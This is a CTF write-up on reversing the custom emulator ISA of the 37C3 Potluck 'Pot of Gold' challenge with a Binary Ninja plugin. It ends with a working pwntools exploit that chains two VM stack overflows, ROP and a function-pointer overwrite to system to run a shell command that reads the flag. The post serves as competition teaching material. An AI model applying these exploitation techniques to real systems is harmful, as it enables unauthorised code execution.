Leveraging Binary Ninja IL to Reverse a Custom ISA: Cracking the “Pot of Gold” 37C3

Written by Thomas Imbert - 05/01/2024 - in Challenges , Exploit , Reverse-engineering - Download

This article explores the process of reversing a custom instruction set architecture (ISA) of the Pot of Gold CTF challenge (37C3 CTF) using Binary Ninja Intermediate Language (IL) to decompile the challenge code. Next, it describes the exploitation part, first getting code execution in the emulator, then pivoting to a second process and ultimately exploiting the opcode emulation to retrieve the flag.

Pot Of Gold is a reversing and pwn challenge written by blasty which was solved by two teams during 37C3 Potluck CTF.

Challenge introduction

Before looking at the provided files, let’s connect to the server:

Challenge prompt

So, the first part of the challenge is to retrieve the password to access the shell kitchen.

Conveniently, a Dockerfile is provided to reproduce the server environment and the following shell script run.sh is executed on new TCP connection.

#!/bin/sh

(/chall /gordon.bin /tmp/x 1 >/dev/null 2>/dev/null) &
sleep 1
/chall /kitchen.bin /tmp/x 0

The chall file is a classic static stripped ELF x86-64 executable and the two binaries files are custom blobs. The custom binaries start with the magic UNICORN (not related to Unicorn Engine) and kitchen.bin contains the welcome banner, so there are probably not encrypted.

Reversing the binary

Although stripped, the challenge binary is readable. It implements an emulator for a custom architecture, the opcode emulation handler function is quickly identified thanks to the large switch case:

IDA Graph of opcode handler function

The emulator is called Virtual Machine (VM) in the rest of the article for simplicity purposes.

The command line argument /tmp/x is used to create a communication channel between gordon.bin the master process and kitchen.bin the slave application (argv[3] used to identify the master). Thus, two FIFO named pipes are created with mknod by the two processes:

  • /tmp/x_master
  • /tmp/x_slave

Then, the binary blob specified in argv[1] is parsed and loaded:

// From reverse engineering of the parsing loop
struct unicorn_blob_file {
    char magic[8]; // const "UNICORN"
    uint16_t nb_segments;
    struct segment {
        uint16_t virtual_base;
        uint16_t size;
        uint16_t protection; // bitfield 1 - read ; 2 - write ; 4 - exec
    } segments[ANYSIZE_ARRAY]; // array of size nb_segments
    char data[ANYSIZE_ARRAY]; // first segment data (array of size segments[0].size)
};

Only the first segment contains data, the others are set to zero.

Note: Both files contain only 2 segments, the first one is the actual blob code and data. The second segment is used for the VM stack.

010 Editor header parsing

Finally, the VM opcode handler is executed in a loop:

// inside main function
  do
  {
    if ( exec_one_instruction(vm) )
      exit(1);
  }
  while ( !vm->stopped );

Reversing the ISA opcodes

The VM management structure can be reversed using the initialization function and the exec_one_instruction function:

struct vm {
    uint64_t regs[8]; // General Purpose Register
    uint64_t sp;
    uint64_t lr;
    uint64_t pc;
    uint64_t fl; // flags register
    void * mem;  // Memory mapping linked list
    void (*handle_syscall)(struct vm*, int syscall_id);
    bool stopped;
    bool is_master;
};

Now the code looks readable and we can understand the basic opcodes:

int exec_one_instruction(vm * vm)
{
    if ( (get_segment_prot(vm, vm->pc) & PROT_EXEC) == 0 )
        exit(1);
    // Read instruction
    read_vm_memory(vm, vm->pc, &opcode, 1);
    read_vm_memory(vm, vm->pc + 1, &arg1, 1);
    read_vm_memory(vm, vm->pc + 2, &arg3, 1);
    read_vm_memory(vm, vm->pc + 3, &arg2, 1);
    arg23 = _byteswap_ushort((arg3 << 8) | arg2);
    // Parse and execute instruction
    switch ( opcode )
    {
        case 0:
            // NOP
            break;
        /* ... */
        case 4:
            // ALU ops
            /* ... */
            switch ( arg1 >> 4 )
            {
                case 0:
                    vm->regs[arg3] = vm->regs[arg2] + operand;
                    break;
                case 1:
                    vm->regs[arg3] = vm->regs[arg2] - operand;
                    break;
                case 2:
                    vm->regs[arg3] =vm->regs[arg2] * operand;
                    break;
            /* ... */
            }
            break;
        case 5:
            // Syscall
            vm->handle_syscall(vm, arg1);
            break;
        /* ... */
        case 8:
            // Push
            vm->sp -= 8;
            write_vm_memory(vm, vm->sp, &vm->regs[arg1], 8);
            break;
        case 9:
            // Pop
            read_vm_memory(vm, vm->sp, &vm->regs[arg1], 8);
            vm->sp += 8;
            break;
        /* ... */
        case 0xC:
            // Branch to link register (ret)
            vm->pc = vm->lr;
            return 0;
    }
    vm->pc += 4;
}

With a better understanding of the VM opcodes, the syscall function can be reversed. Syscalls are used to provide VM a way to interact with the user (1/2) and also with the other VM process (3/4).

Syscall ID Description
0 Stop the VM
1 Output a character (regs[0])
2 Read a character (regs[0])
3 Send message to FIFO (ptr: regs[0], size: regs[1])
4 Receive message from FIFO (ptr: regs[0], size: regs[1])
5 Pseudo random generator (regs[0])
7 Get uptime (system("uptime > /tmp/u") to ptr: regs[0])

A sharp reader may have noticed that the instruction parser is not free of bugs (register index not validated) but at this stage, no control can be exerted on the instructions.

Writing a decompiler for the custom ISA

Dissassembler

The next step would be to write a quick-and-dirty dissassembler to analyze both binaries and find the password to access the shell.

The ISA was implemented in Binary Ninja to get a better visual representation of the code flow (graph view).

The architecture plugin API of Binary Ninja is well documented in a series of blogposts.

Since writing an architecture plugin requires closing and opening Binary Ninja for each code change, starting with the loader makes the process easier (no need to choose the architecture and the loading file offset each time).

A loader is called a BinaryView, let’s implement the loader:

from struct import unpack
from binaryninja.binaryview import BinaryView
from binaryninja.enums import SegmentFlag

class POTLUCKView(BinaryView):
    name = 'POTLUCKView'
    long_name = 'POTLUCKView ROM'

    def __init__(self, data):
        BinaryView.__init__(self, parent_view = data, file_metadata = data.file)
        # self.platform = Architecture['POTLUCK'].standalone_platform
        self.data = data

    @classmethod
    def is_valid_for_data(self, data):
        header = data.read(0, 7)
        return header == b'UNICORN'

    def perform_get_address_size(self):
        return 8

    def init(self):
        # Parse struct unicorn_blob_file
        segment_count = unpack("<H", self.data.read(0x8, 2))[0]
        print(f"segment count = {segment_count}")
        # Only the first segment is loaded from file
        base = unpack("<H", self.data.read(0xA, 2))[0]
        size = unpack("<H", self.data.read(0xC, 2))[0]
        prot = unpack("<H", self.data.read(0xE, 2))[0]
        # Load code + data from file offset (0xA + sizeof(struct segment) * segment_count) at base: 0x0
        self.add_auto_segment(base, size, 0xA + 6 * segment_count, size, SegmentFlag.SegmentReadable|SegmentFlag.SegmentExecutable)
        # No need to load the zeroed stack segment (read full loader code if interested)
        return True
    
    def perform_is_executable(self):
        return True

    def perform_get_entry_point(self):
        return 0

POTLUCKView.register()

The file format is recognized and loaded automatically:

Binary Ninja load view

Now the architecture should be added to provide ISA information to Binary Ninja.

An architecture must contain three callbacks:

  • get_instruction_text(self, data: bytes, addr: int) -> Optional[Tuple[List[InstructionTextToken], int]]
    • Instruction decoding to text
  • get_instruction_info(self, data:bytes, addr:int) -> Optional[InstructionInfo]
    • Metadata of instruction for control flow analysis
  • get_instruction_low_level_il(self, data: bytes, addr: int, il: LowLevelILFunction) -> Optional[int]
    • Instruction to Binary Ninja IL for decompilation

The architecture also provides the address size, the registers including the stack and link register to help the analysis.

If we implement only the push/pop instructions for example:

from typing import Callable, List, Type, Optional, Dict, Tuple, NewType

from binaryninja.architecture import Architecture, InstructionInfo, RegisterInfo
from binaryninja.lowlevelil import LowLevelILFunction
from binaryninja.function import InstructionTextToken
from binaryninja.enums import InstructionTextTokenType

class POTLUCK(Architecture):
    name = "POTLUCK"
    address_size = 4
    default_int_size = 4
    instr_alignment = 4
    max_instr_length = 4
    regs = {
        'R0': RegisterInfo('R0', 4),
        'R1': RegisterInfo('R1', 4),
        'R2': RegisterInfo('R2', 4),
        'R3': RegisterInfo('R3', 4),
        'R4': RegisterInfo('R4', 4),
        'R5': RegisterInfo('R5', 4),
        'R6': RegisterInfo('R6', 4),
        'R7': RegisterInfo('R7', 4),
        'SP': RegisterInfo('SP', 4),
        'LR': RegisterInfo('LR', 4),
    }
    stack_pointer = "SP"
    link_reg = "LR"

    def get_instruction_info(self, data:bytes, addr:int) -> Optional[InstructionInfo]:
        return None

    def get_instruction_text(self, data: bytes, addr: int) -> Optional[Tuple[List[InstructionTextToken], int]]:
        opcode = data[0]
        arg1 = data[1]
        ops = []
        if opcode == 8:
            ops.append(InstructionTextToken(InstructionTextTokenType.TextToken, "push "))
            ops.append(InstructionTextToken(InstructionTextTokenType.RegisterToken, f'R{arg1}'))
        elif opcode == 9:
            ops.append(InstructionTextToken(InstructionTextTokenType.TextToken, "pop "))
            ops.append(InstructionTextToken(InstructionTextTokenType.RegisterToken, f'R{arg1}'))
        return ops, 4 # len of instruction

    def get_instruction_low_level_il(self, data: bytes, addr: int, il: LowLevelILFunction) -> Optional[int]:
        return None

POTLUCK.register()

Uncomment the line # self.platform = Architecture['POTLUCK'].standalone_platform in the BinaryView to automatically load the correct architecture.

Note: Never return 0 in get_instruction_text and get_instruction_low_level_il since the return value is the number of parsed bytes, it will cause an infinite loop. Instead return None.

Implementing the other 11 instructions (plus 9 sub opcodes for ALU) is not described here.

One important missing piece is the control flow analysis using get_instruction_info, without it, Binary Ninja cannot find function boundaries:

Binary Ninja no control flow view

During development to get a linear dissassembly, implement a basic get_instruction_info stub that accepts any sequence of bytes.

    def get_instruction_info(self, data:bytes, addr:int) -> Optional[InstructionInfo]:
        info = InstructionInfo()
        info.length = 4
        return info

The get_instruction_info provides information about branches, calls, returns and syscalls.

From the documentation:

BranchType Description
UnconditionalBranch Branch will always be taken
FalseBranch False branch condition
TrueBranch True branch condition
CallDestination Branch is a call instruction (Branch with Link)
FunctionReturn Branch returns from a function
SystemCall System call instruction
IndirectBranch Branch destination is a memory address or register
UnresolvedBranch Branch destination is an unknown address

In the custom ISA, only syscall (5), conditional branch (1), call (10) and ret modify the control flow.

    def get_instruction_info(self, data:bytes, addr:int) -> Optional[InstructionInfo]:
        if not is_valid_instruction(data):
            return None
        opcode = data[0]
        arg1 = data[1]
        arg23 = get_arg23(data[2:4])
        result = InstructionInfo()
        result.length = 4
        if opcode == 5:     # SYSCALL
            result.add_branch(BranchType.SystemCall, arg1)
        elif opcode == 1:   # BRANCH
            if arg1 == 0:
                result.add_branch(BranchType.UnconditionalBranch, addr + arg23) # b +imm
            else:
                result.add_branch(BranchType.TrueBranch, addr + arg23) # b +imm if flag
                result.add_branch(BranchType.FalseBranch, addr + 4)    # continue if not flag
        elif opcode == 10:  # CALL
            if arg1 == 1:
                result.add_branch(BranchType.IndirectBranch) # call register
            else:
                result.add_branch(BranchType.CallDestination, addr + arg23) # call +imm
        elif opcode == 12:  # RET
            result.add_branch(BranchType.FunctionReturn)
        return result

Now the dissassembly is readable and the reverse engineering of the gordon and kitchen binaries can start:

Graph view

Decompiler

The code is readable but it is possible to do better with Binary Ninja IL.

Indeed with the Intermediate Language, the architecture plugin can describe the custom ISA instructions using Binary Ninja low level instructions (LLIL_LOAD, LLIL_ADD, LLIL_SET_REG, …) that will be analyzed by Binary Ninja to produce a clean pseudo C decompiled output.

The following function for example will be much easier to read in pseudo code after several optimization passes performed automatically.

ASM:

Code hard to read

Pseudo C:

Code in C

The third callback is used to return the IL operations: get_instruction_low_level_il.

One complex part is handling the conditional branches and it is described in the second blogpost of Binary Ninja. In addition, handling properly the flag register on compares and branches opcodes can be time consuming, ignore it unless interested to learn.

To represent an ISA instruction, multiple Binary Ninja Low Level IL (LLIL) instructions can be appended. Actually, one LLIL instruction is structured as a expression tree that contain sub-LLIL instructions as operands.

def get_instruction_low_level_il(self, data: bytes, addr: int, il: LowLevelILFunction) -> Optional[int]:
    # ...
    # Represent: xor rX, 0xX
    dst = src = RegisterName(get_register_name(arg[0]))
    operand = il.const(4, arg[1])
    ## value of rX
    op = il.reg(4, src)
    # XOR (value of rX, const)
    op = il.xor_expr(4, op, operand)
    # set value of rX (XOR (value of rX, const))
    op = il.set_reg(4, dst, op)
    # Append it to the il `LowLevelILFunction`
    il.append(op)
    return 4 # len of instruction

With the documentation and available python plugin examples, implementing the ~20 instructions is quite fast.

To nicely display syscalls in pseudo C view, a virtual register ID and a custom calling convention for syscall was registered. Indeed by default, the system_call IL doesn’t take any parameter thus the decompiled view will only show syscall();.

# Lift syscall in get_instruction_low_level_il
il.append(il.set_reg(4, RegisterName('ID'), il.const(4, arg1)))
i = il.system_call()

# Syscall custom calling convention
class CustomSyscall(CallingConvention):
    int_arg_regs = ['ID', 'R0', 'R1']
    int_return_reg = 'R0'
    eligible_for_heuristics = False # force display of int_arg_regs

# Register custom calling convention
CustomSyscall(arch=Architecture['POTLUCK'], name='CustomSyscall')
Architecture['POTLUCK'].register_calling_convention(cc_sys)
self.platform.system_call_convention = cc_sys

The full plugin source code is available here (code was written in haste for CTF).

Note: Although the ISA uses 64-bits registers, the decompiled code looks better with 32-bit address_size.

Now, the challenge can be approached with ease, or so it seems.

Gordon VM

The main function receives 256 bytes from the Kitchen FIFO and based on the first word of the message, it calls a different command function:

Gordon main
  • 0xf01dc0de -> Send random sentence to Kitchen
  • 0xbadf0001 -> Send hardcoded “Friendship is not for sale, dummy!” to Kitchen
  • 0xc0cac01a -> Provide free stack buffer overflow
  • 0xc01db007 -> Send uptime to Kitchen

Indeed, the handler for 0xc0cac01a is the following and the size of the memcpy is larger than the reserved size of the var_84 buffer:

// Low level IL representation
0x00000380  int32_t command_c0ca(int32_t* arg1 @ R0)

   0x00000380  push(LR)
   0x00000384  SP = SP - 0x80
   0x00000388  R1 = R0
   0x0000038c  R0 = SP {var_84}
   0x00000390  R2 = 0x100
   0x00000394  call(memcpy) // memcpy(&var_84, arg1, 0x100);
   0x00000398  SP = SP + 0x80
   0x0000039c  LR = pop
   0x000003a0  <return> jump(LR)

It is nice to find a bug but currently the function is not reachable…

Kitchen VM

The main function generates and sends to the user a secret challenge. Then, it receives the user input and compares it with the secret challenge XOR 1ac0cac05eea150d1df0af5c11ba5eba.

Note: The xor_with_const was shown as an example in the Decompiler section.

Kitchen main

The Kitchen strings are encrypted (except the banner) with the following algorithm:

def decrypt(addr, size):
    o = b''
    for i, e in enumerate(bv.read(addr, size)):
        key = struct.pack('<I', (0xf00dcafe ^ ((addr + i) * 0x10001)))
        o += bytes([e ^ key[(addr + i) % 4]])
    return o

# >>> decrypt(0x1239, 38)
# b"Welcome to Shell's Kitchen, stranger!\n"

The shell kitchen is a menu with 4 options:

  • 1 -> send 0xf01dc0de to Gordon and print the random phrase
  • 2 -> read 0xff bytes (stops on 0xa or 0xd) in a stack variable of size 0x44 ; then send 0xbadf0001 to Gordon and print the returned string (Friendship)
  • 3 -> send 0xc01db007 to Gordon and print uptime
  • 4 -> exit

Neat! Another stack buffer overflow and this time reachable with user input. Note that the corruption occurs inside the custom VM, allowing control of the instruction pointer in the emulated code.

Vulnerabilities and exploit steps

After sending the correct challenge, sending a buffer of 0x44 bytes in the command 2 will trigger the stack buffer overflow and corrupt saved LR in the VM.

Kitchen stack buffer overflow

In Kitchen, the stack is RW and the code is RX due to VM memory protection but careful readers may have noticed that the stack of Gordon VM is RWX. Thus pivoting to Gordon process is interesting to forge corrupted instructions and reach the vulnerability in the ISA opcode parsing (Out-Of-Bounds register index).

Since there is no stack cookie and no ALSR in the both VM, the exploitation part is straightforward.

The exploit plan is:

  1. Trigger command 2 stack buffer overflow in Kitchen
  2. ROP in Kitchen to send vulnerable 0xc0cac01a command to Gordon
  3. Trigger command 0xc0cac01a stack buffer overflow in Gordon
  4. Ret2shellcode in Gordon on malformed instruction
    • Malformed instruction to write past registers in struct vm directly overwriting handle_syscall function pointer
    • Replace handle_syscall function pointer with system address
    • Execute instruction syscall to run arbitrary shell command
    • Read the flag
    • Send back the flag to Kitchen using FIFO
  5. ROP continue in Kitchen to receive the flag and print it to stdout

Step 1 & 2

Fortunately, the following gadget in Kitchen allows us to control all registers used as arguments (R0, R1, R2) and the link register before jumping to the syscall 4 to send to Gordon the payload.

0x0000164  pop LR
0x0000168  pop R5
0x000016c  pop R4
0x0000170  pop R2
0x0000174  pop R1
0x0000178  pop R0
0x000017c  ret

The stack pointer is not randomized in the VM, so the input buffer address is hardcoded in the exploit.

Step 3 & 4

The challenge binary is not PIE also it is statically built. The system function is present in the binary to handle the uptime command. Thus the exploit hardcodes the address of system.

Most instructions don’t check the register index but due to the limitation of character 0xd in the read function, encoding R13 register results in the forbidden byte:

    uint64_t regs[8];
    uint64_t sp; // OOB index 8  (0x8)
    uint64_t lr; // OOB index 9  (0x9)
    uint64_t pc; // OOB index 10 (0xa)
    uint64_t fl; // OOB index 11 (0xb)
    void * mem;  // OOB index 12 (0xc)
    void (*handle_syscall)(struct vm*, int syscall_id); // OOB index 13 (R13) (0xd)

Thankfully, the mov instruction uses the 4 msb bits to select the destination register so encoding the mov results in valid bytes 0x07 0xd0 0x00 0x00.

    case 7:
        /* ... */
        vm->regs[arg1 >> 4] = vm->regs[arg3];

The handler of handle_syscall replaced, the first argument is the pointer to the vm structure. The first fields are the VM registers, consequently the exploit can control the registers to create a string in memory that will be executed as system command.

Since stdout and stderr are closed in the run.sh script, the flag cannot be printed directly.

In order to send the flag to Kitchen, the system command redirects writes to the FIFO file (/tmp/x_master).

Step 5

The ROP chain continues in Kitchen by calling in the middle of a function to receive from the FIFO and print it to stdout.

Note: The full payload exploiting both VM plus the challenge executable is bundled inside one message of 0xff bytes.

Conclusion

The full exploit script is available below and got us the flag and the first blood during 37C3 Potluck CTF.

Thanks blasty for the cool challenge and ZetaTwo for the CTF!

Exploit script

from pwn import *

r = remote('challenge27.play.potluckctf.com', 31337)

# Secret challenge
r.recvuntil(b'stew:\n\n')
secret = bytes.fromhex(r.recvline().strip().decode())
code = xor(secret, p32(0xc0cac01a) + p32(0xd15ea5e) + p32(0x5caff01d) + p32(0xba5eba11)).hex().encode()
r.sendline(code)

# Select vulnerable command 2
r.recvuntil(b'choice> ')
r.sendline(b'2')
r.recvline()

# Gadgets
pop_lr_r5_r4_r2_r1_r0 = 0x164
send_command_gadget = 0x5b0
recv_and_print = 0x714
stack_in_kitchen = 0xfdb8
stack_in_gordon = 0xef7c
system_api_chall = 0x4033A2

# Payload
payload = p32(0xc0cac01a) # command magic
# Gordon shellcode
'''
syscall instruction -> handle_syscall(vm) -> system(vm) -> system(&vm->regs[0])
r0/r1/r2 -> "cat /fla* > /tmp/x_master\x00"
'''
payload += b'\x09\x05\x00\x00' # pop r5 -- @system
payload += b'\x07\xd0\x05\x00' # mov R13, R5 -- write to handle_syscall
payload += b'\x09\x00\x00\x00' # pop r0 -- cat /flag...
payload += b'\x09\x01\x00\x00' # pop r1
payload += b'\x09\x02\x00\x00' # pop r2
payload += b'\x09\x03\x00\x00' # pop r3
payload += b'\x05\x07\x00\x00' # syscall 7

assert len(payload) <= 0x40
payload += b'X' * (0x40 - len(payload))
# Kitchen ROP chain
payload += p64(pop_lr_r5_r4_r2_r1_r0)
payload += p64(send_command) # lr
payload += p64(0) # r5
payload += p64(0) # r4
payload += p64(0) # r2
payload += p64(0x100) # r1
payload += p64(stack_in_kitchen) # r0
payload += p64(recv_and_print) # recv + print
payload += b'X' * (0x80 - len(payload))
# Gordon ret2shellcode
payload += p64(stack_in_gordon)
# Gordon shellcode pop
payload += p64(system_api_chall) # @system
payload += b'cat /fla* > /tmp/x_master\x00' # cmd

assert not b"\x0a" in payload
assert not b"\x0d" in payload
payload += b'\n'

r.send(payload)

r.interactive()
# potluck{3y3_4m_n0t_th3_0n3_t0_s0Rt_0f_s1T_4nD_cRY_0v3R_sP1Lt_m1LK!1!!}